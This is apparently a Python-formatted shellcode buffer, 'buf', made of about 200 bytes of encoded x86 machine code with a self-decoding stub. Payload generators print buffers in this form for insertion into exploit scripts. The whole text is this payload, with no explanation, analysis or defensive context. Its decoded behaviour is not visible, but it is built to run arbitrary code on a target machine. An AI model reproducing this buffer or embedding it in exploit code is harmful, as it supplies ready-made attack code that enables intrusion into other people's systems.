buf =  b""
buf += b"\xba\xee\x3a\x70\x32\xdb\xc7\xd9\x74\x24\xf4\x5f"
buf += b"\x31\xc9\xb1\x31\x83\xef\xfc\x31\x57\x0f\x03\x57"
buf += b"\xe1\xd8\x85\xce\x15\x9e\x66\x2f\xe5\xff\xef\xca"
buf += b"\xd4\x3f\x8b\x9f\x46\xf0\xdf\xf2\x6a\x7b\x8d\xe6"
buf += b"\xf9\x09\x1a\x08\x4a\xa7\x7c\x27\x4b\x94\xbd\x26"
buf += b"\xcf\xe7\x91\x88\xee\x27\xe4\xc9\x37\x55\x05\x9b"
buf += b"\xe0\x11\xb8\x0c\x85\x6c\x01\xa6\xd5\x61\x01\x5b"
buf += b"\xad\x80\x20\xca\xa6\xda\xe2\xec\x6b\x57\xab\xf6"
buf += b"\x68\x52\x65\x8c\x5a\x28\x74\x44\x93\xd1\xdb\xa9"
buf += b"\x1c\x20\x25\xed\x9a\xdb\x50\x07\xd9\x66\x63\xdc"
buf += b"\xa0\xbc\xe6\xc7\x02\x36\x50\x2c\xb3\x9b\x07\xa7"
buf += b"\xbf\x50\x43\xef\xa3\x67\x80\x9b\xdf\xec\x27\x4c"
buf += b"\x56\xb6\x03\x48\x33\x6c\x2d\xc9\x99\xc3\x52\x09"
buf += b"\x42\xbb\xf6\x41\x6e\xa8\x8a\x0b\xe4\x2f\x18\x36"
buf += b"\x4a\x2f\x22\x39\xfa\x58\x13\xb2\x95\x1f\xac\x11"
buf += b"\xd2\xd0\xe6\x38\x72\x79\xaf\xa8\xc7\xe4\x50\x07"
buf += b"\x0b\x11\xd3\xa2\xf3\xe6\xcb\xc6\xf6\xa3\x4b\x3a"
buf += b"\x8a\xbc\x39\x3c\x39\xbc\x6b\x5f\xdc\x2e\xf7\x8e"
buf += b"\x7b\xd7\x92\xce"
